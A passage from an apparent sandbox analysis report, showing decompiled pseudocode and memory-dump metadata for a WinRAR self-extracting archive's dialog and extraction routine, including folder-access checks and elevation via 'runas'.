    																			if(_t263 < 0x400) {
    																				__eflags = _t263;
    																				if(__eflags >= 0) {
    																					if(__eflags <= 0) {
    																						L63:
    																						_t268 = 0;
    																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
    																						L68:
    																						__eflags =  *((char*)(_t276 + 0x12));
    																						if( *((char*)(_t276 + 0x12)) == 0) {
    																							goto L4;
    																						}
    																					} else {
    																						E00850E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
    																						L62:
    																						_t276 = _t276 + 0xc;
    																						goto L63;
    																					}
    																				}
    																			} else {
    																				_t263 =  *(_t276 + 0x20);
    																				goto L56;
    																			}
    																		}
    																	} else {
    																		goto L51;
    																	}
    																}
    															}
    														} else {
    															goto L47;
    														}
    													}
    												}
    												goto L69;
    												L51:
    												_t260 = _t260 + 0x4ae4;
    												_t193 =  *(_t276 + 0x14) + 1;
    												 *(_t276 + 0x14) = _t193;
    												__eflags = _t193 -  *(_t276 + 0x1c);
    											} while (_t193 <  *(_t276 + 0x1c));
    											goto L52;
    										}
    									}
    									goto L69;
    								}
    							}
    							continue;
    						}
    					}
    					break;
    				}
    				L69:
    				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
    				E0084484D(_t216);
    				_t241 =  *(_t276 + 0x28) * 0x4ae4;
    				_t164 =  *((intOrPtr*)(_t216 + 0x18));
    				_t223 = 5;
    				__eflags = _t164 + _t241 + 0x30;
    				return E0084EA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
    			}










































    0x008462ea
    0x008462ec
    0x008462fa
    0x00846302
    0x00846306
    0x00846308
    0x0084630a
    0x0084630a
    0x0084630d
    0x00846313
    0x00846314
    0x00846319
    0x00846323
    0x0084630a
    0x00846332
    0x00846342
    0x0084634b
    0x00846352
    0x00846355
    0x00846357
    0x0084635b
    0x0084635d
    0x00846361
    0x00846365
    0x00846369
    0x00846369
    0x00846375
    0x0084637b
    0x0084637c
    0x00846381
    0x00846387
    0x00000000
    0x00000000
    0x0084638d
    0x0084638f
    0x00846393
    0x0084639b
    0x00000000
    0x008463a1
    0x008463a7
    0x00000000
    0x008465fd
    0x008463b1
    0x008463b3
    0x008463b7
    0x008463bb
    0x008463bb
    0x008463bd
    0x008463c3
    0x008463c7
    0x008463c7
    0x008463c9
    0x008463cc
    0x008463ce
    0x008463d2
    0x008463d9
    0x008463db
    0x008463ee
    0x008463f3
    0x008463fb
    0x008463fe
    0x008463fe
    0x00846402
    0x00846405
    0x0084640b
    0x00846411
    0x00846417
    0x0084641a
    0x0084641d
    0x00000000
    0x0084641d
    0x008463dd
    0x008463dd
    0x00846421
    0x00846421
    0x00846426
    0x00846430
    0x00846436
    0x0084643a
    0x00846440
    0x00846473
    0x00846473
    0x00846478
    0x00846489
    0x00846489
    0x00846490
    0x0084647a
    0x0084647a
    0x00846481
    0x00000000
    0x00846483
    0x00846483
    0x00846483
    0x00846481
    0x00846498
    0x008464a5
    0x008464a7
    0x008464aa
    0x008464ae
    0x008464ae
    0x008464b0
    0x008464b4
    0x008464bc
    0x008464bc
    0x008464c1
    0x00000000
    0x00000000
    0x008464b6
    0x008464b6
    0x008464ba
    0x00000000
    0x00000000
    0x008464ba
    0x00846442
    0x00846445
    0x00846449
    0x0084644f
    0x00846450
    0x00846455
    0x00846457
    0x008464d2
    0x008464d2
    0x00846459
    0x00846459
    0x0084645d
    0x00846468
    0x00846468
    0x0084646c
    0x00000000
    0x0084645f
    0x0084645f
    0x00846466
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00846466
    0x0084645d
    0x00846457
    0x00846440
    0x00000000
    0x008464c3
    0x008464c6
    0x008464c8
    0x008464c8
    0x008464d0
    0x008464d7
    0x008464d7
    0x008464dd
    0x008464e2
    0x008464e4
    0x008464e6
    0x008464e8
    0x008464e8
    0x008464e8
    0x008464e9
    0x008464eb
    0x008464ed
    0x008464ef
    0x008464f1
    0x008464f5
    0x008464f5
    0x008464fb
    0x008464ff
    0x00846503
    0x00846507
    0x00846509
    0x0084650c
    0x0084650e
    0x00846511
    0x00846513
    0x00846515
    0x00846517
    0x00846517
    0x00846519
    0x0084651e
    0x00846521
    0x00846536
    0x00846523
    0x00846526
    0x00846526
    0x0084653f
    0x00846541
    0x00846545
    0x00846549
    0x00846549
    0x0084654f
    0x0084654f
    0x00846553
    0x00846557
    0x00846559
    0x008466b4
    0x00000000
    0x0084655f
    0x00846562
    0x00846569
    0x0084656d
    0x0084656f
    0x008465db
    0x008465db
    0x00000000
    0x00846571
    0x00846571
    0x00846571
    0x00846573
    0x00846576
    0x00846578
    0x0084657f
    0x0084659a
    0x0084659d
    0x008465a2
    0x008465a4
    0x00000000
    0x00000000
    0x00846581
    0x00846584
    0x00846589
    0x0084658b
    0x00846591
    0x00846598
    0x008465aa
    0x008465aa
    0x008465b1
    0x008465b7
    0x008465be
    0x00846615
    0x0084661a
    0x0084661d
    0x0084661f
    0x00846625
    0x0084662c
    0x00846630
    0x00846638
    0x0084663e
    0x00846641
    0x00846645
    0x0084664c
    0x00846650
    0x00846657
    0x00846659
    0x0084665b
    0x00846671
    0x00846679
    0x00846682
    0x00846686
    0x0084668c
    0x00000000
    0x0084668c
    0x00000000
    0x00846659
    0x008465c0
    0x008465c0
    0x008465c4
    0x0084660a
    0x0084660c
    0x008465df
    0x008465df
    0x008465e1
    0x008465e7
    0x008465eb
    0x008465ed
    0x008465f3
    0x0084669e
    0x008466a0
    0x008466a2
    0x00846696
    0x00846696
    0x00846698
    0x008466b8
    0x008466b8
    0x008466bd
    0x00000000
    0x00000000
    0x008466a4
    0x008466ad
    0x00846693
    0x00846693
    0x00000000
    0x00846693
    0x008466a2
    0x008465f9
    0x008465f9
    0x00000000
    0x008465f9
    0x008465f3
    0x00000000
    0x00000000
    0x00000000
    0x008465c4
    0x008465be
    0x00000000
    0x00000000
    0x00000000
    0x00846598
    0x0084658b
    0x00000000
    0x008465c6
    0x008465ca
    0x008465d0
    0x008465d1
    0x008465d5
    0x008465d5
    0x00000000
    0x00846573
    0x0084656f
    0x00000000
    0x00846559
    0x00846605
    0x00000000
    0x008463a7
    0x0084639b
    0x00000000
    0x00846393
    0x008466c3
    0x008466cb
    0x008466ce
    0x008466d3
    0x008466e1
    0x008466e6
    0x008466f4
    0x00846712

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 9b85e2d264910ff42a40567625e1bdcc1077154afe9916a748a68e21743a4609
    • Instruction ID: c39fb740dfce5afb9c3232faaab6ae570d479d2b119af3319628f4e78270aa90
    • Opcode Fuzzy Hash: 9b85e2d264910ff42a40567625e1bdcc1077154afe9916a748a68e21743a4609
    • Instruction Fuzzy Hash: 94D1C6B1A043498FDB14CF28C88175ABBE0FF96308F05056DE945DB646E734E968CB9B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0084A62C(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
    				void* __ebx;
    				long _t105;
    				long _t106;
    				struct HWND__* _t107;
    				struct HWND__* _t111;
    				void* _t114;
    				void* _t115;
    				int _t116;
    				void* _t133;
    				void* _t137;
    				signed int _t149;
    				struct HWND__* _t152;
    				void* _t163;
    				void* _t166;
    				int _t169;
    				void* _t182;
    				struct HWND__* _t189;
    				void* _t190;
    				long _t195;
    				void* _t220;
    				signed int _t230;
    				void* _t231;
    				void* _t246;
    				long _t247;
    				long _t248;
    				long _t249;
    				signed int _t254;
    				WCHAR* _t255;
    				int _t259;
    				void* _t261;
    				void* _t266;
    				void* _t270;
    				signed short _t275;
    				int _t277;
    				struct HWND__* _t279;
    				WCHAR* _t286;
    				intOrPtr _t288;
    				intOrPtr _t289;
    				void* _t291;
    				intOrPtr _t292;
    				void* _t304;
    				struct HWND__* _t306;
    				signed int _t309;
    				void* _t310;
    				struct HWND__* _t312;
    				void* _t314;
    				long _t316;
    				struct HWND__* _t319;
    				struct HWND__* _t320;
    				void* _t321;
    				void* _t323;
    				void* _t325;
    				void* _t327;
    
    				_t303 = __edx;
    				_t285 = __ecx;
    				E0084D8C4(E00861584, __ecx);
    				E0084D9C0();
    				_t275 =  *(_t325 + 0x10);
    				_t309 =  *(_t325 + 0xc);
    				_t306 =  *(_t325 + 8);
    				if(E008312D7(__edx, _t306, _t309, _t275,  *(_t325 + 0x14), L"STARTDLG", 0, 0) == 0) {
    					_t310 = _t309 - 0x110;
    					__eflags = _t310;
    					if(__eflags == 0) {
    						E0084C399(__edx, __eflags, __fp0, _t306);
    						_t105 =  *0x87b704;
    						_t277 = 1;
    						 *0x8775c8 = _t306;
    						 *0x8775e8 = _t306;
    						__eflags = _t105;
    						if(_t105 != 0) {
    							SendMessageW(_t306, 0x80, 1, _t105); // executed
    						}
    						_t106 =  *0x885d04;
    						__eflags = _t106;
    						if(_t106 != 0) {
    							SendDlgItemMessageW(_t306, 0x6c, 0x172, 0, _t106); // executed
    						}
    						_t107 = GetDlgItem(_t306, 0x68);
    						 *(_t325 + 0x14) = _t107;
    						SendMessageW(_t107, 0x435, 0, 0x400000);
    						E0084966B(_t325 - 0x1164, 0x800);
    						_t111 = GetDlgItem(_t306, 0x66);
    						__eflags =  *0x879602;
    						_t312 = _t111;
    						 *(_t325 + 0x10) = _t312;
    						_t286 = 0x879602;
    						if( *0x879602 == 0) {
    							_t286 = _t325 - 0x1164;
    						}
    						SetWindowTextW(_t312, _t286);
    						E00849AA5(_t312); // executed
    						_push(0x8775d8);
    						_push(0x8775d4);
    						_push(0x88ce18);
    						_push(_t306);
    						 *0x8775f3 = 0; // executed
    						_t114 = E00849F62(_t286, _t303, __eflags); // executed
    						__eflags = _t114;
    						if(_t114 == 0) {
    							 *0x8775ce = _t277;
    						}
    						__eflags =  *0x8775d8;
    						if( *0x8775d8 > 0) {
    							_push(7);
    							_push( *0x8775d4);
    							_push(_t306);
    							E0084B522(_t286, _t303);
    						}
    						__eflags =  *0x88de20;
    						if( *0x88de20 == 0) {
    							SetDlgItemTextW(_t306, 0x6b, E0083DA8B(0xbf));
    							SetDlgItemTextW(_t306, _t277, E0083DA8B(0xbe));
    						}
    						__eflags =  *0x8775d8;
    						if( *0x8775d8 <= 0) {
    							L103:
    							__eflags =  *0x8775f3;
    							if( *0x8775f3 != 0) {
    								L114:
    								__eflags =  *0x8795fc - 2;
    								if( *0x8795fc == 2) {
    									EnableWindow(_t312, 0);
    								}
    								__eflags =  *0x8785f8;
    								if( *0x8785f8 != 0) {
    									E00831294(_t306, 0x67, 0);
    									E00831294(_t306, 0x66, 0);
    								}
    								_t115 =  *0x8795fc;
    								__eflags = _t115;
    								if(_t115 != 0) {
    									__eflags =  *0x8775cc;
    									if( *0x8775cc == 0) {
    										_push(0);
    										_push(_t277);
    										_push(0x111);
    										_push(_t306);
    										__eflags = _t115 - _t277;
    										if(_t115 != _t277) {
    											 *0x86df38();
    										} else {
    											SendMessageW(); // executed
    										}
    									}
    								}
    								__eflags =  *0x8775ce;
    								if( *0x8775ce != 0) {
    									SetDlgItemTextW(_t306, _t277, E0083DA8B(0x90));
    								}
    								goto L125;
    							}
    							__eflags =  *0x88ce0c;
    							if( *0x88ce0c != 0) {
    								goto L114;
    							}
    							__eflags =  *0x8795fc;
    							if( *0x8795fc != 0) {
    								goto L114;
    							}
    							__eflags = 0;
    							_t314 = 0xaa;
    							 *((short*)(_t325 - 0x9688)) = 0;
    							do {
    								__eflags = _t314 - 0xaa;
    								if(_t314 != 0xaa) {
    									L109:
    									__eflags = _t314 - 0xab;
    									if(__eflags != 0) {
    										L111:
    										E0083FABF(__eflags, _t325 - 0x9688, " ", 0x2000);
    										E0083FABF(__eflags, _t325 - 0x9688, E0083DA8B(_t314), 0x2000);
    										goto L112;
    									}
    									__eflags =  *0x88de20;
    									if(__eflags != 0) {
    										goto L112;
    									}
    									goto L111;
    								}
    								__eflags =  *0x88de20;
    								if( *0x88de20 == 0) {
    									goto L112;
    								}
    								goto L109;
    								L112:
    								_t314 = _t314 + 1;
    								__eflags = _t314 - 0xb0;
    							} while (__eflags <= 0);
    							_t288 =  *0x8775dc; // 0x0
    							E00849059(_t288, __eflags,  *0x870064,  *(_t325 + 0x14), _t325 - 0x9688, 0, 0);
    							_t312 =  *(_t325 + 0x10);
    							goto L114;
    						} else {
    							_push(0);
    							_push( *0x8775d4);
    							_push(_t306); // executed
    							E0084B522(_t286, _t303); // executed
    							_t133 =  *0x88ce0c;
    							__eflags = _t133;
    							if(_t133 != 0) {
    								__eflags =  *0x8795fc;
    								if(__eflags == 0) {
    									_t289 =  *0x8775dc; // 0x0
    									E00849059(_t289, __eflags,  *0x870064,  *(_t325 + 0x14), _t133, 0, 0);
    									L00852BAE( *0x88ce0c);
    									_pop(_t286);
    								}
    							}
    							__eflags =  *0x8795fc - _t277;
    							if( *0x8795fc == _t277) {
    								L102:
    								_push(_t277);
    								_push( *0x8775d4);
    								_push(_t306);
    								E0084B522(_t286, _t303);
    								goto L103;
    							} else {
    								 *0x86df3c(_t306);
    								__eflags =  *0x8795fc - _t277;
    								if( *0x8795fc == _t277) {
    									goto L102;
    								}
    								__eflags =  *0x879601;
    								if( *0x879601 != 0) {
    									goto L102;
    								}
    								_push(3);
    								_push( *0x8775d4);
    								_push(_t306);
    								E0084B522(_t286, _t303);
    								__eflags =  *0x88de18;
    								if( *0x88de18 == 0) {
    									goto L102;
    								}
    								_t137 = DialogBoxParamW( *0x870064, L"LICENSEDLG", 0, E0084A43C, 0);
    								__eflags = _t137;
    								if(_t137 == 0) {
    									L25:
    									 *0x8775cc = _t277;
    									L26:
    									_push(_t277);
    									L13:
    									EndDialog(_t306, ??); // executed
    									L125:
    									_t116 = _t277;
    									L126:
    									 *[fs:0x0] =  *((intOrPtr*)(_t325 - 0xc));
    									return _t116;
    								}
    								goto L102;
    							}
    						}
    					}
    					__eflags = _t310 != 1;
    					if(_t310 != 1) {
    						L7:
    						_t116 = 0;
    						goto L126;
    					}
    					_t149 = (_t275 & 0x0000ffff) - 1;
    					__eflags = _t149;
    					if(_t149 == 0) {
    						__eflags =  *0x8775cd;
    						if( *0x8775cd != 0) {
    							L23:
    							_t316 = 0x800;
    							GetDlgItemTextW(_t306, 0x66, _t325 - 0x2164, 0x800);
    							__eflags =  *0x8775cd;
    							if( *0x8775cd == 0) {
    								__eflags =  *0x8775ce;
    								if( *0x8775ce == 0) {
    									_t152 = GetDlgItem(_t306, 0x68);
    									__eflags =  *0x8775ec;
    									_t279 = _t152;
    									if( *0x8775ec == 0) {
    										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
    										SendMessageW(_t279, 0xc2, 0, 0x8622e4);
    										_t316 = 0x800;
    									}
    									SetFocus(_t279);
    									__eflags =  *0x8785f8;
    									if( *0x8785f8 == 0) {
    										E0083FAE7(_t325 - 0x1164, _t325 - 0x2164, _t316);
    										E0084C16A(_t285, _t325 - 0x1164, _t316);
    										E00833F53(_t325 - 0x4288, 0x880, E0083DA8B(0xb9), _t325 - 0x1164);
    										_t327 = _t327 + 0x10;
    										_t163 = _t325 - 0x4288;
    									} else {
    										_t163 = E0083DA8B(0xba);
    									}
    									E0084C1EB(0, _t163);
    									__eflags =  *0x879601;
    									if( *0x879601 == 0) {
    										E0084C852(_t325 - 0x2164);
    									}
    									_push(0);
    									_push(_t325 - 0x2164);
    									 *(_t325 + 0x17) = 0;
    									_t166 = E00839DDE(0, _t325);
    									_t277 = 1;
    									__eflags = _t166;
    									if(_t166 != 0) {
    										L40:
    										_t304 = E00849B00(_t325 - 0x2164);
    										 *((char*)(_t325 + 0x13)) = _t304;
    										__eflags = _t304;
    										if(_t304 != 0) {
    											L43:
    											_t169 =  *(_t325 + 0x17);
    											L44:
    											_t291 =  *0x879601;
    											__eflags = _t291;
    											if(_t291 != 0) {
    												L50:
    												__eflags =  *((char*)(_t325 + 0x13));
    												if( *((char*)(_t325 + 0x13)) != 0) {
    													 *0x8775d0 = _t277;
    													E008312B2(_t306, 0x67, 0);
    													E008312B2(_t306, 0x66, 0);
    													SetDlgItemTextW(_t306, _t277, E0083DA8B(0xe6)); // executed
    													E008312B2(_t306, 0x69, _t277);
    													SetDlgItemTextW(_t306, 0x65, 0x8622e4); // executed
    													_t319 = GetDlgItem(_t306, 0x65);
    													__eflags = _t319;
    													if(_t319 != 0) {
    														_t195 = GetWindowLongW(_t319, 0xfffffff0) | 0x00000080;
    														__eflags = _t195;
    														SetWindowLongW(_t319, 0xfffffff0, _t195);
    													}
    													_push(5);
    													_push( *0x8775d4);
    													_push(_t306);
    													E0084B522(_t291, _t304);
    													_push(2);
    													_push( *0x8775d4);
    													_push(_t306);
    													E0084B522(_t291, _t304);
    													_push(0x88ce18);
    													_push(_t306);
    													 *0x88fe3c = _t277; // executed
    													E0084C755(_t291, _t304, __eflags); // executed
    													_push(6);
    													_push( *0x8775d4);
    													 *0x88fe3c = 0;
    													_push(_t306);
    													E0084B522(_t291, _t304);
    													__eflags =  *0x8775cc;
    													if( *0x8775cc == 0) {
    														__eflags =  *0x8775ec;
    														if( *0x8775ec == 0) {
    															__eflags =  *0x88de2c;
    															if( *0x88de2c == 0) {
    																_push(4);
    																_push( *0x8775d4);
    																_push(_t306);
    																E0084B522(_t291, _t304);
    															}
    														}
    													}
    													E00831294(_t306, _t277, _t277);
    													 *0x8775d0 =  *0x8775d0 & 0x00000000;
    													__eflags =  *0x8775d0;
    													_t182 =  *0x8775cc; // 0x1
    													goto L75;
    												}
    												__eflags = _t291;
    												_t169 = (_t169 & 0xffffff00 | _t291 != 0x00000000) - 0x00000001 &  *(_t325 + 0x17);
    												__eflags = _t169;
    												L52:
    												__eflags = _t169;
    												 *(_t325 + 0x17) = _t169 == 0;
    												__eflags = _t169;
    												if(_t169 == 0) {
    													L66:
    													__eflags =  *(_t325 + 0x17);
    													if( *(_t325 + 0x17) != 0) {
    														_push(E0083DA8B(0x9a));
    														E00833F53(_t325 - 0x5688, 0xa00, L"\"%s\"\n%s", _t325 - 0x2164);
    														E00836F18(0x8700e0, _t277);
    														E008497A8(_t306, _t325 - 0x5688, E0083DA8B(0x96), 0x30);
    														 *0x8775ec =  *0x8775ec + 1;
    													}
    													L12:
    													_push(0);
    													goto L13;
    												}
    												GetModuleFileNameW(0, _t325 - 0x1164, 0x800);
    												E0083E7E0(0x87b602, _t325 - 0x164, 0x80);
    												_push(0x87a602);
    												E00833F53(_t325 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t325 - 0x2164);
    												_t327 = _t327 + 0x14;
    												 *(_t325 - 0x48) = 0x3c;
    												 *((intOrPtr*)(_t325 - 0x44)) = 0x40;
    												 *((intOrPtr*)(_t325 - 0x38)) = _t325 - 0x1164;
    												 *((intOrPtr*)(_t325 - 0x34)) = _t325 - 0x11ca0;
    												 *(_t325 - 0x40) = _t306;
    												 *((intOrPtr*)(_t325 - 0x3c)) = L"runas";
    												 *(_t325 - 0x2c) = _t277;
    												 *((intOrPtr*)(_t325 - 0x28)) = 0;
    												 *((intOrPtr*)(_t325 - 0x30)) = 0x8775f8;
    												_t321 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
    												 *(_t325 + 8) = _t321;
    												__eflags = _t321;
    												if(_t321 == 0) {
    													 *(_t325 + 0x10) =  *(_t325 + 0x14);
    												} else {
    													 *0x885d08 = 0;
    													_t231 = GetCommandLineW();
    													__eflags = _t231;
    													if(_t231 != 0) {
    														E0083FAE7(0x885d0a, _t231, 0x2000);
    													}
    													E0084A2C1(0x87b602, 0x889d0a, 7);
    													E0084A2C1(0x87b602, 0x88ad0a, 2);
    													E0084A2C1(0x87b602, 0x88bd0a, 0x10);
    													 *0x88ce0b = _t277;
    													E0083E942(_t277, 0x88cd0a, _t325 - 0x164);
    													 *(_t325 + 0x10) = MapViewOfFile(_t321, 2, 0, 0, 0);
    													E0084EA80(_t238, 0x885d08, 0x7104);
    													_t327 = _t327 + 0xc;
    												}
    												_t220 = ShellExecuteExW(_t325 - 0x48);
    												E0083E98D(_t325 - 0x164, 0x80);
    												E0083E98D(_t325 - 0x11ca0, 0x430c);
    												__eflags = _t220;
    												if(_t220 == 0) {
    													_t323 =  *(_t325 + 0x10);
    													 *(_t325 + 0x17) = _t277;
    													goto L64;
    												} else {
    													 *0x86df20( *(_t325 - 0x10), 0x2710);
    													_t71 = _t325 + 0xc;
    													 *_t71 =  *(_t325 + 0xc) & 0x00000000;
    													__eflags =  *_t71;
    													_t323 =  *(_t325 + 0x10);
    													while(1) {
    														__eflags =  *_t323;
    														if( *_t323 != 0) {
    															break;
    														}
    														Sleep(0x64);
    														_t230 =  *(_t325 + 0xc) + 1;
    														 *(_t325 + 0xc) = _t230;
    														__eflags = _t230 - 0x64;
    														if(_t230 < 0x64) {
    															continue;
    														}
    														break;
    													}
    													 *0x88de2c =  *(_t325 - 0x10);
    													L64:
    													__eflags =  *(_t325 + 8);
    													if( *(_t325 + 8) != 0) {
    														UnmapViewOfFile(_t323);
    														CloseHandle( *(_t325 + 8));
    													}
    													goto L66;
    												}
    											}
    											__eflags = _t304;
    											if(_t304 == 0) {
    												goto L52;
    											}
    											E00833F53(_t325 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
    											_t327 = _t327 + 0x10;
    											E008394D4(_t325 - 0x3188);
    											 *(_t325 - 4) =  *(_t325 - 4) & 0x00000000;
    											_push(0x11);
    											_push(_t325 - 0x1164);
    											_t246 = E008395C0(_t325 - 0x3188);
    											 *((char*)(_t325 + 0x13)) = _t246;
    											__eflags = _t246;
    											if(_t246 == 0) {
    												_t247 = GetLastError();
    												__eflags = _t247 - 5;
    												if(_t247 == 5) {
    													 *(_t325 + 0x17) = _t277;
    												}
    											}
    											_t39 = _t325 - 4;
    											 *_t39 =  *(_t325 - 4) | 0xffffffff;
    											__eflags =  *_t39;
    											_t169 = E00839506(_t325 - 0x3188); // executed
    											_t291 =  *0x879601;
    											goto L50;
    										}
    										_t248 = GetLastError();
    										_t304 =  *((intOrPtr*)(_t325 + 0x13));
    										__eflags = _t248 - 5;
    										if(_t248 != 5) {
    											goto L43;
    										}
    										_t169 = _t277;
    										 *(_t325 + 0x17) = _t169;
    										goto L44;
    									} else {
    										_t249 = GetLastError();
    										__eflags = _t249 - 5;
    										if(_t249 == 5) {
    											L39:
    											 *(_t325 + 0x17) = _t277;
    											goto L40;
    										}
    										__eflags = _t249 - 3;
    										if(_t249 != 3) {
    											goto L40;
    										}
    										goto L39;
    									}
    								} else {
    									_t277 = 1;
    									_t182 = 1;
    									 *0x8775cc = 1;
    									L75:
    									__eflags =  *0x8775ec;
    									if( *0x8775ec <= 0) {
    										goto L26;
    									}
    									__eflags = _t182;
    									if(_t182 != 0) {
    										goto L26;
    									}
    									 *0x8775cd = _t277;
    									SetDlgItemTextW(_t306, _t277, E0083DA8B(0x90));
    									_t292 =  *0x8700e0; // 0x0
    									__eflags = _t292 - 9;
    									if(_t292 != 9) {
    										__eflags = _t292 - 3;
    										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
    										__eflags = _t189;
    										 *(_t325 + 0x14) = _t189;
    										_t320 = _t189;
    									} else {
    										_t320 = 0xa0;
    									}
    									_t190 = E0083DA8B(0x96);
    									E008497A8(_t306, E0083DA8B(_t320), _t190, 0x30);
    									goto L125;
    								}
    							}
    							_t277 = 1;
    							__eflags =  *0x8775ce;
    							if( *0x8775ce == 0) {
    								goto L26;
    							}
    							goto L25;
    						}
    						__eflags =  *0x88fe3c;
    						if( *0x88fe3c == 0) {
    							goto L23;
    						} else {
    							__eflags =  *0x88fe3d;
    							_t254 = _t149 & 0xffffff00 |  *0x88fe3d == 0x00000000;
    							__eflags = _t254;
    							 *0x88fe3d = _t254;
    							_t255 = E0083DA8B((0 | _t254 != 0x00000000) + 0xe6);
    							_t277 = 1;
    							SetDlgItemTextW(_t306, 1, _t255);
    							while(1) {
    								__eflags =  *0x88fe3d;
    								if( *0x88fe3d == 0) {
    									goto L125;
    								}
    								__eflags =  *0x8775cc;
    								if( *0x8775cc != 0) {
    									goto L125;
    								}
    								_t259 = GetMessageW(_t325 - 0x64, 0, 0, 0);
    								__eflags = _t259;
    								if(_t259 == 0) {
    									goto L125;
    								} else {
    									_t261 =  *0x86df50(_t306, _t325 - 0x64);
    									__eflags = _t261;
    									if(_t261 == 0) {
    										TranslateMessage(_t325 - 0x64);
    										DispatchMessageW(_t325 - 0x64);
    									}
    									continue;
    								}
    							}
    							goto L125;
    						}
    					}
    					_t266 = _t149 - 1;
    					__eflags = _t266;
    					if(_t266 == 0) {
    						_t277 = 1;
    						__eflags =  *0x8775d0;
    						 *0x8775cc = 1;
    						if( *0x8775d0 == 0) {
    							goto L12;
    						}
    						__eflags =  *0x8775ec;
    						if( *0x8775ec != 0) {
    							goto L125;
    						}
    						goto L12;
    					}
    					__eflags = _t266 == 0x65;
    					if(_t266 == 0x65) {
    						_t270 = E00831217(_t306, E0083DA8B(0x64), _t325 - 0x1164);
    						__eflags = _t270;
    						if(_t270 != 0) {
    							SetDlgItemTextW(_t306, 0x66, _t325 - 0x1164);
    						}
    						goto L1;
    					}
    					goto L7;
    				}
    				L1:
    				_t116 = 1;
    				goto L126;
    			}
























































    0x0084a62c
    0x0084a62c
    0x0084a631
    0x0084a63b
    0x0084a641
    0x0084a645
    0x0084a649
    0x0084a662
    0x0084a66c
    0x0084a66c
    0x0084a672
    0x0084ad0e
    0x0084ad13
    0x0084ad1a
    0x0084ad1b
    0x0084ad21
    0x0084ad27
    0x0084ad29
    0x0084ad33
    0x0084ad33
    0x0084ad39
    0x0084ad3e
    0x0084ad40
    0x0084ad4d
    0x0084ad4d
    0x0084ad5c
    0x0084ad6b
    0x0084ad6e
    0x0084ad80
    0x0084ad88
    0x0084ad8a
    0x0084ad92
    0x0084ad94
    0x0084ad97
    0x0084ad9c
    0x0084ad9e
    0x0084ad9e
    0x0084ada6
    0x0084adad
    0x0084adb2
    0x0084adb7
    0x0084adbc
    0x0084adc1
    0x0084adc2
    0x0084adc9
    0x0084adce
    0x0084add0
    0x0084add2
    0x0084add2
    0x0084add8
    0x0084addf
    0x0084ade1
    0x0084ade3
    0x0084ade9
    0x0084adea
    0x0084adea
    0x0084adef
    0x0084adf6
    0x0084ae06
    0x0084ae19
    0x0084ae19
    0x0084ae1f
    0x0084ae26
    0x0084aed7
    0x0084aed7
    0x0084aede
    0x0084af87
    0x0084af87
    0x0084af8e
    0x0084af93
    0x0084af93
    0x0084af99
    0x0084afa0
    0x0084afa7
    0x0084afb1
    0x0084afb1
    0x0084afb6
    0x0084afbb
    0x0084afbd
    0x0084afbf
    0x0084afc6
    0x0084afc8
    0x0084afca
    0x0084afcb
    0x0084afd0
    0x0084afd1
    0x0084afd3
    0x0084afdd
    0x0084afd5
    0x0084afd5
    0x0084afd5
    0x0084afd3
    0x0084afc6
    0x0084afe3
    0x0084afea
    0x0084aff9
    0x0084aff9
    0x00000000
    0x0084afea
    0x0084aee4
    0x0084aeeb
    0x00000000
    0x00000000
    0x0084aef1
    0x0084aef8
    0x00000000
    0x00000000
    0x0084aefe
    0x0084af00
    0x0084af05
    0x0084af0c
    0x0084af0c
    0x0084af12
    0x0084af1d
    0x0084af1d
    0x0084af23
    0x0084af2e
    0x0084af3f
    0x0084af57
    0x00000000
    0x0084af57
    0x0084af25
    0x0084af2c
    0x00000000
    0x00000000
    0x00000000
    0x0084af2c
    0x0084af14
    0x0084af1b
    0x00000000
    0x00000000
    0x00000000
    0x0084af5c
    0x0084af5c
    0x0084af5d
    0x0084af5d
    0x0084af65
    0x0084af7f
    0x0084af84
    0x00000000
    0x0084ae2c
    0x0084ae2c
    0x0084ae2e
    0x0084ae34
    0x0084ae35
    0x0084ae3a
    0x0084ae3f
    0x0084ae41
    0x0084ae43
    0x0084ae4a
    0x0084ae4c
    0x0084ae60
    0x0084ae6b
    0x0084ae70
    0x0084ae70
    0x0084ae4a
    0x0084ae71
    0x0084ae77
    0x0084aeca
    0x0084aeca
    0x0084aecb
    0x0084aed1
    0x0084aed2
    0x00000000
    0x0084ae79
    0x0084ae7a
    0x0084ae80
    0x0084ae86
    0x00000000
    0x00000000
    0x0084ae88
    0x0084ae8f
    0x00000000
    0x00000000
    0x0084ae91
    0x0084ae93
    0x0084ae99
    0x0084ae9a
    0x0084ae9f
    0x0084aea6
    0x00000000
    0x00000000
    0x0084aebc
    0x0084aec2
    0x0084aec4
    0x0084a7b8
    0x0084a7b8
    0x0084a7be
    0x0084a7be
    0x0084a6e2
    0x0084a6e3
    0x0084afff
    0x0084afff
    0x0084b001
    0x0084b007
    0x0084b011
    0x0084b011
    0x00000000
    0x0084aec4
    0x0084ae77
    0x0084ae26
    0x0084a678
    0x0084a67b
    0x0084a68f
    0x0084a68f
    0x00000000
    0x0084a68f
    0x0084a680
    0x0084a680
    0x0084a683
    0x0084a6ee
    0x0084a6f5
